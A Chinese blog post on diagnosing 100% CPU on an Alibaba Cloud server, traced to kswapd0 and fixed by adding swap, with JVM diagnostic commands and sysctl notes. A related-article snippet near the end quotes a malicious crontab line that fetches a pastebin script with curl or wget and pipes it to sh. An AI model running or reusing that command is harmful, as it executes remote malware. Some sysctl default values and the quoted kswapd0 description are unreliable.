阿里云服务器CPU 100%问题

已于 2024-02-14 15:15:34 修改
阅读量1.1k 收藏 21
点赞数 24
文章标签: 阿里云 服务器 云计算
于 2024-02-14 15:14:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37454852/article/details/136113525
版权

原创内容,未经同意,请勿转发,原文地址:
复制到CSDN,图片链接失效,建议直接访问原站:哇塞码农网

1、问题描述

最近趁着阿里云服务器搞活动买了几年的阿里云服务器,2c2g的配置,用于本站(哇塞码农)的部署和运维

之前是部署在bandwagon的服务器上,但价格比较贵,而且也存在不可描述的风险,这里的配置是1c1g

明明阿里云服务器的配置更高,但是部署到阿里云之后反而出问题了,经常部署之后运行两三天服务器cpu利用率就会100%,磁盘读也很高,服务直接不可用,网站也无法正常访问了

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

2、排查过程

2.1、工单提问

2.1.1、事后排查工具atop

由于问题出现后便无法远程登录,只能重启。但重启只能临时解决,过段时间后便会再次出现。

于是,我先找到了阿里云的技术支持(题外话,阿里系的客服还是可以的),询问有没有办法事后排查问题原因的办法。阿里云的技术支持推荐使用atop:

您好,您这边可以使用atop工具监控系统资源使用情况:https://help.aliyun.com/zh/ecs/how-to-use-the-linux-system-atop-monitoring-tools?spm=a2c4g.11186623.0.i6 后续可以通过atop日志分析下占用资源的进程

在按照阿里云的atop文档安装完毕后,便只能静静等待问题再次出现了……

注意,若各位遇到类似的情况,不要强制重启服务器,强制重启服务器会导致atop的日志文件丢失!

2.1.2、罪魁祸首kswapd0

终于,在下次问题出现时,根据atop的日志,排查到了罪魁祸首:kswapd0进程!

新图片

来自chatGPT的kswapd0简介:

kswapd0是Linux系统中的一个内核线程,它的作用是在系统内存不足时执行页面交换(swap)操作。当系统的物理内存不足以满足当前运行程序的需求时,Linux内核会将部分不常用的内存页面(页)移到交换空间(swap space)中,以释放物理内存供其他程序使用。kswapd0负责管理这些页面交换的过程,包括选择哪些页面需要被换出、将页面写入交换空间、以及从交换空间中换入页面等操作,以确保系统内存的有效利用和性能稳定。

kswapd0通常在系统空闲时运行,其优先级相对较低,以免影响到正在执行的其他重要任务。在系统负载较低且内存充足时,kswapd0可能处于睡眠状态,只有在内存压力增加时才会被唤醒执行页面交换操作。

在发现是系统进程时,我先是再次找到阿里云的技术支持,询问是否是机器或系统有问题,但是回复是内存太小,java应用比较吃内存,建议我升级内存配置……

我大为震惊,为什么搬瓦工1c1g都没有这个问题,阿里云2c2g却有问题?无奈,不再寄希望于阿里云官方,只能自己排查原因了

2.2、kswapd0病毒疑云

百度kswapd0占用cpu利用率过高,很多中文网站都在说kswapd0病毒的问题,吓得我按他们一些文章查了下,但是并没有发现他们说的问题……

2.3、内存泄漏分析

继续往下排查,难道是迁移后对java应用做了一些改造出现内存泄漏了?

于是又按照排查内存泄漏的思路进行排查,但仍旧一无所获!我的应用并没有明显的内存泄漏情况

full GC情况都很正常,内存泄漏分析工具分析出来的结果也是正常的

下面也列举一下排查gc和内存泄漏的方法,各位如果需要也可以按这个思路查一下:

2.3.1、gc情况查询

使用 jstat 命令查看垃圾回收的统计信息,例如:

docker exec -it <container-id-or-name> jstat -gc <pid>

这些信息包括不同区域(S0、S1、EC、OC等)的容量(C:容量,U:已使用),垃圾回收的次数(YGC:Young GC次数,FGC:Full GC次数,CGC:Compacting GC次数)以及相应的时间和耗时等。

下面是对一些关键字段的解释:

  • S0CS1C:S0和S1区的容量(Capacity)。
  • S0US1U:S0和S1区的已使用(Used)空间。
  • ECEU:Eden区的容量和已使用空间。
  • OCOU:Old区(老年代)的容量和已使用空间。
  • MCMU:元空间(Metaspace)的容量和已使用空间。
  • CCSCCCSU:压缩类空间的容量和已使用空间。
  • YGCT:Young垃圾回收的总时间(秒)。
  • FGCFGCT:Full垃圾回收的次数和总时间。
  • CGCCGCT:压缩垃圾回收的次数和总时间。
  • GCT:总的垃圾回收时间。

2.3.2、内存泄漏分析

使用 jcmd 和 jmap

连接到运行中的Java进程,并使用 **jcmdjmap 生成堆转储文件

我这里使用了docker,没有用docker请酌情修改:

bashCopy code
docker exec -it <container-id-or-name> jcmd <pid> GC.heap_dump /path/to/dump.hprof

**替换 ** 为您的容器ID或名称, 为Java进程的ID。这将在容器中生成堆转储文件。

之后将dump.hprof文件保存到本地,借助于分析java dump文件的工具分析

我这里用到了Memory Analyzer (Eclipse MAT),分析后的结果可以参考:

新图片

2.4、内存太小?

折腾了一番之后,并没有发现问题原因。

于是,我回到最初的问题,阿里云技术支持说是内存太小了

并且,kswapd0是处理内存交换的进程,但是我这台阿里云服务器好像没有开启内存交换;而我之前用的搬瓦工是开了内存交换区的

难道是因为内存耗尽,并且没有开交换区,导致服务器kswapd0进程频繁读写磁盘,cpu利用率变高的吗?

想到这,我倒吸一口冷气🥶开干!我玩的就是真实!😡

2.4.1、开启交换区

开启交换区可以参考阿里云文档:

https://help.aliyun.com/zh/ecs/how-do-i-configure-a-swap-partition-on-a-linux-instance-and-resolve-frequently-asked-questions?spm=a2c6h.14164896.0.0.798447c52MTB5u&scm=20140722.S_help@@%E6%96%87%E6%A1%A3@@42534._.ID_help@@%E6%96%87%E6%A1%A3@@42534-RL_swap-LOC_llm-OR_ser-V_3-RE_new2-P0_0

部分参数本文做一些简单的补充说明:

dd if=/dev/zero of=/mnt/swap bs=1M count=4096

这些参数是 Linux 内核的一些系统调整参数,用于配置系统的行为。以下是每个参数的简要说明:

  1. vm.swappiness = 40:
  • 意义:控制内核在内存不足时对交换空间的使用倾向程度。
  • 默认值:60
  • 建议:适用于多数情况,使得系统更加平衡地使用物理内存和交换空间。
  1. kernel.sysrq = 1:
  • 意义:启用 SysRq 键的使用。SysRq 键提供了一组对内核的低级调试和操作的功能。
  • 默认值:0(禁用)
  • 建议:在需要进行系统调试或恢复时启用,但正常运行时最好禁用。
  1. net.ipv4.neigh.default.gc_stale_time = 120:
  • 意义:定义 ARP 高速缓存(neighbor cache)的过期时间(以秒为单位)。
  • 默认值:60
  • 建议:适用于大多数网络环境,可以根据实际情况调整。
  1. net.ipv4.conf.all.rp_filter = 0:
  • 意义:启用/禁用反向路径过滤,用于防范 IP 源地址欺骗攻击。
  • 默认值:1(启用)
  • 建议:根据网络拓扑和需求进行调整。
  1. net.ipv4.conf.default.rp_filter = 0:
  • 同上,对默认网络接口的设置。
  1. net.ipv4.conf.default.arp_announce = 2:
  • 意义:ARP 发送规则,控制系统对 ARP 响应中的源 IP 地址的选择。
  • 默认值:0
  • 建议:2(适用于多地址绑定的情况)。
  1. net.ipv4.conf.lo.arp_announce = 2:
  • 同上,对本地回环接口的设置。
  1. net.ipv4.conf.all.arp_announce = 2:
  • 同上,对所有网络接口的设置。
  1. net.ipv4.tcp_max_tw_buckets = 5000:
  • 意义:定义系统同时保持的 TIME-WAIT 状态的最大数量。
  • 默认值:180000
  • 建议:适用于防止过多 TIME-WAIT 状态的系统。
  1. net.ipv4.tcp_syncookies = 1:
  • 意义:启用 TCP syncookies,用于防范 SYN 攻击。
  • 默认值:0(禁用)
  • 建议:1(启用)
  1. net.ipv4.tcp_synack_retries = 2:
  • 意义:定义发送 SYN-ACK 包后等待 ACK 的次数。
  • 默认值:5**
  • 建议:适用于防范 TCP 连接建立问题。
  1. net.ipv4.tcp_slow_start_after_idle = 0:
  • 意义:禁用 TCP 的慢启动算法。默认值:1
    建议:0(禁用)

这些参数的具体设置需要根据系统的实际需求和网络环境来调整。在进行调整时,请确保了解每个参数的含义,以及如何适应你的系统配置。

2.4.2、开启交换区后

开启交换区后,系统终于恢复正常了,不再每隔几天就挂掉了,谢天谢地😇

新图片

3、最后

希望本文的内容对你有所帮助

如果可以,麻烦关注一下本站 https://wscoder.com/

您的支持,是我的最大动力

笨比master
关注
  • 24
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
阿里云ECS服务器入门使用流程(新手必看教程)
01-20
一、阿里云根据个人需要选合适的云服务器,选好cpu、内存、带宽,地域,这四个是主要的。其他可以默认选择。 二、登陆控制台 输入账号密码,进去看到服务界面,新手可能不容易看懂。点击左侧菜单,点击云服务器,显示界面如图: 点击实例,在左上角选择区域(一定要选对地域才能看到服务器),这时看到服务器信息了,如图: 大家不要看这里这么多信息,对我们有用的其实只有几个而已,别的都不用看。 更多参阅云服务器配置帮助文档。 三、连接主机 1、通过控制台连接 阿里云服务器要用到两个密码,一个是远程登录密码,一个是实例密码,就是我们平常登录服务器的root密码(以linux服务器为例)。 通过控制台连接
阿里云ECS服务器CPU总是100%跑满该怎么排查?
星速云
07-19 3951
一、背景和现象 初创公司,架构lanmp,web前端和后端分开服务器,业务驱动主要是nginx和apache,nginx主要是处理静态文件和反向代理,前后端、搜索引擎、缓存、队列等附加的服务都是用docker容器部署。因为比较初级,上传文件和采集文件都是直接写在硬盘上,涉及到的目录共享,就在其中一台服务器存储并且nfs共享。我们暂且分为ECS1(apache1)、ECS2(apache2)、ECS3(nginx)。某天网站业务中断,但是没有报错。一直在等待响应,默认响应超时是一分钟,所以很基础高可用没有起
阿里云服务器搭建方案.docx
06-26
阿里云服务器搭建方案全文共1页,当前为第1页。阿里云服务器搭建方案全文共1页,当前为第1页。百微电子阿里云服务器搭建方案 阿里云服务器搭建方案全文共1页,当前为第1页。 阿里云服务器搭建方案全文共1页,当前为第1页。 1.服务器搭建方案详细配置如下: 服务器位置 方案一:北京(考虑离通辽较近) 方案二:上海(离公司较近) Cpu 2核(可动态升级) 内存 内存2GB(可动态升级) 带宽 4M(可动态升级) 镜像类型 公共镜像(阿里云默认原始镜像) Ubuntu12.04 64位操作系统(选定之后不可更改) 系统盘 普通的云盘,系统盘挂载点:/dev/xvda 20G大小 数据盘 0(可动态升级,考虑到自带系统盘还会剩下10G左右的空间,完全够openfire使用暂不考虑购买额外的数据盘) 负载均衡SLB 目前仅购买一台服务器,不考虑SLB,当后期有多台服务器的时候可以考虑,但需要注意的是:使用SLB必须要求服务器在同一个地区。 云盾 自带免费 域名 server.cdbaiwei.com 购买时长 2年 2.搭建步骤 将域名和阿里云服务器端的固定IP绑定以实现域名的访问 在服务器端安装
阿里云服务器ECS的6大功能组件
01-07
阿里的云服务在国内可以说是首屈一指的了,因此他们家的云服务器也是最受欢迎的。那么,你知道阿里云服务器ECS有哪些功能组件吗?不清楚不要紧,下面服务器吧小编带大家来看看。 在了解之前我们来看一张阿里云服务器ECS的产品组件架构图: 阿里云服务器ECS主要包含以下功能组件: 1.实例:等同于一台虚拟服务器,内含CPU、内存、操作系统、网络配置、磁盘等基础的计算组件。实例的计算性能、内存性能和适用业务场景由实例规格决定,其具体性能指标包括实例vCPU核数、内存大小、网络性能等。 2.镜像:提供实例的操作系统、初始化应用数据及预装的软件。操作系统支持多种Linux发行版和多种Windows Serv
c# 阿里云邮件服务发送邮件
09-30
c# 使用阿里云邮件发送服务 发送邮件 注意事项:本地测试发送邮件成功,发布部署到服务器不能发送邮件,可能是阿里云的25端口没开,阿里云默认关闭25端口,注意在控制台申请解封
一次排查腾讯云CPU100%
weixin_33713350的博客
01-12 966
今天一大早网站突然挂了 然后服务器就登不上了 现在就是想办法登录到云服务器上 采用 腾讯云 VNS浏览器登录https://cloud.tencent.com/dev... 开始排查 首先top查看 发现123这个进程高了 下面可以输入命令 ll /proc/5664 就可以看到路径先删除进程文件 在 kill -9 5664 解...
阿里云ECS的CPU100%排查
weixin_30677475的博客
03-27 879
一、背景和现象 初创公司,架构lanmp,web前端和后端分开服务器,业务驱动主要是nginx和apache,nginx主要是处理静态文件和反向代理,前后端、搜索引擎、缓存、队列等附加的服务都是用docker容器部署。因为比较初级,上传文件和采集文件都是直接写在硬盘上,涉及到的目录共享,就在其中一台服务器存储并且nfs共享。我们暂且分为ECS1(apache1)、ECS2(apache2)、EC...
服务器cpu占用过高一般是什么原因,常见云服务器CPU占用100%问题原因及解决办法...
weixin_35574537的博客
07-29 5040
老左看到有网友留言,提到他自己前几天618大促活动中购买的某个商家1G1M配置服务器速度比较慢,然后用宝塔面板统计看到CPU一直在80%以上。于是担心是不是网站有被入侵的问题。于是老左问他网站访问量多少,他告诉我一天大约5000+IP地址,看到这里应该大家知道问题的症结所在。这位同学本着能省就省的态度,1G1M的配置服务器不是说不能做网站,也有见到有网友日IP几千是没有问题的,但是他这位同学网站有...
阿里云服务器cpu 100% 问题处理
云飞的博客
04-18 6966
阿里云服务器CPU 100%,但使用top命令查看却找不到相关进程。 执行crontab -l 查看,发现多了一条定时任务 */23 * * * * (curl -fsSL https://pastebin.com/raw/qbbSdzZd||wget -q -O- https://pastebin.com/raw/qbbSdzZd)|sh 手动执行curl -fsSL https://p...
基于阿里云服务器ECS的建站过程
01-20
建站过程:阿里云服务器ECS(1个月9.5元/12个月98.7元)+域名(1年45元)+备案幕布(15)= 年消耗大概是114元 整站搭建过程 购买空间:阿里云服务器学生特惠,过程不累述啦 创建实例:购买完进入管理控制台, 到云...
阿里云服务器存储带宽资源价格表.xlsx
09-02
该表格由本人亲自通过再阿里云...本表格中整理了阿里云通用云服务器价格(包含cpu、内存、硬盘),阿里云云硬盘资源从20G到50T的价格,带宽资源从1M到500M的价格。该表格可以为一些企业或个人、政府机构提供一些参考。
Linux服务器chattr文件被黑问题解决方法
JunyouYH的博客
05-20 2617
木马攻击问题由来阐述 我买了三年的阿里云服务器(在阿里云官网买的),已经使用了一年多了,平时拿来搭建网站,有时也拿来学习技术和开发测试,一直使用很稳定。直到近期我服务器上安装了docker并部署了springboot+mysql+nginx项目,就被攻击了。但就在今年的5月14号,我的服务器被木马攻击,然后被拿去挖矿了。我服务器cpu持续维持在CPU100%. 后果是直接导致我网站无法正常请求和响应。而且Linux服务器的root权限被窃取了。 黑客在服务器/root/.ssh目录下生成了连root用户
如何处理阿里云ECS服务器CPU利用率过高?
aliyuncloud的博客
07-24 542
在这种情况下,可以考虑升级服务器的硬件配置。例如,可以增加CPU的核数、提升CPU的频率或添加更多的内存,以提高服务器的处理性能和并发能力。然而,有时我们可能会面临服务器CPU利用率过高的问题,这可能会导致服务器性能下降,甚至影响到用户体验和服务的可用性。总结来说,处理阿里云ECS服务器CPU利用率过高的问题,可以通过检查应用程序和进程、升级硬件配置、负载均衡与资源优化以及自动化运维与监控等方式进行解决。通过使用阿里云提供的自动化运维工具和监控服务,可以及时发现服务器的异常情况,并进行针对性的优化和调整。
服务器CPU飙升为100%问题排查及如何避免
qq_37515544的博客
04-02 5221
服务器CPU飙升为100%问题排查及如何避免一、定位哪个程序占用的CPU较高二、栈信息输出三、定位哪一个线程占用率高四、线程ID转为16进制,访问转换地址五、通过16进制的线程ID在栈信息中查找定位代码行六、CPU飙升问题产生的背景七、如何避免CPU飙升问题 一、定位哪个程序占用的CPU较高 linux命令:top windows:任务管理器 二、栈信息输出 命令格式:jstack pid > 文件信息 eg:jstack 5115 > a.txt 三、定位哪一个线程占用率高 常用命令:按
Jenkins集成Terraform实现阿里云CDN自动刷新
mujingluo的博客
04-24 224
在互联网业务中,CDN的应用已经成了普遍,SRE的日常需求中,CDN的刷新在前端需求逐渐中占了很大比例,并且比较琐碎。做为合格的SRE,把一切自动化是终极使命,而今天就分享通过Jenkins+Terraform实现阿里云的CDN自动刷新,给大家提供一个自动化思路。
阿里云企业邮箱API的使用方法?调用限制?
最新发布
danplus的博客
04-26 361
阿里云企业邮箱API为企业提供了强大的邮箱管理和操作功能。AokSend,利用API/SMTP接口,无缝对接阿里云企业邮箱API,让邮件发送更高效、更稳定。轻松管理,一键发送,您的营销利器!
python免费调用阿里云通义千问(q-wen-max)大模型API
Cachel Wood的博客
04-20 683
通义千问,是基于阿里巴巴达摩院在自然语言处理领域的研究和积累。采用更先进的算法和更优化的模型结构,能够更准确地理解和生成自然语言、代码、表格等文本。除了基本的文本生成和问答能力,还支持更多的定制化需求,可以针对不同场景和应用进行扩展和定制,提供更加个性化的服务和解决方案。创建好API Key之后,进入阿里云服务百炼的个人账号即可看到调用需要的API Key。进入阿里云大模型服务百炼平台,可以看到所有通义千问模型,选择适当的模型进行调用。产品文档中有详尽的参数设置以及使用指引和具体的各种调用代码。
使用Openvpn打通内网与阿里云VPC过程
Coder加油站的专栏
04-22 892
在办公室的时候经常需要访问阿里云服务器,但是有些服务器是没有公网IP的,需要通过阿云的的内网地址进行访问,这样就很不方便了。需要通过几台服务器进行中转。我们可以通过配置一台openvpn服务器,打通内网与阿里云服务器之间的访问,在办公室也可以直接通过内网地址访问阿里云服务器了。
阿里云服务器ssh死机
08-29
阿里云服务器ssh死机可能是由于各种原因引起的。在使用阿里云服务器过程中,有几个常见的原因可能导致ssh死机。 首先,可能是服务器资源使用过度导致的。如果服务器的资源(如CPU、内存)被过度占用,可能会导致ssh连接无法正常工作。这时,您可以通过监控服务器资源使用情况,查看是否存在资源使用异常的情况,并根据需要进行资源调整。 其次,网络连接问题也可能是导致ssh死机的原因之一。如果服务器所在的网络环境出现问题,如网络波动、网络中断等,可能会导致ssh连接失败或死机。您可以尝试重新连接或重启服务器,同时检查网络环境是否正常。 另外,配置错误或软件问题也可能导致ssh死机。如果服务器的配置文件或软件出现问题,可能会导致ssh无法正常连接。您可以检查服务器的配置文件是否正确,并尝试重新启动相关服务。 总结来说,阿里云服务器ssh死机可能是由于资源使用过度、网络连接问题或配置错误所致。您可以根据具体情况进行排查和处理,如调整资源、检查网络环境、修复配置错误等。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [阿里云服务器的优势,为何选择阿里云服务器?](https://blog.csdn.net/weixin_44705894/article/details/91902589)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [阿里云服务器好不好](https://blog.csdn.net/weixin_68810814/article/details/126408158)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值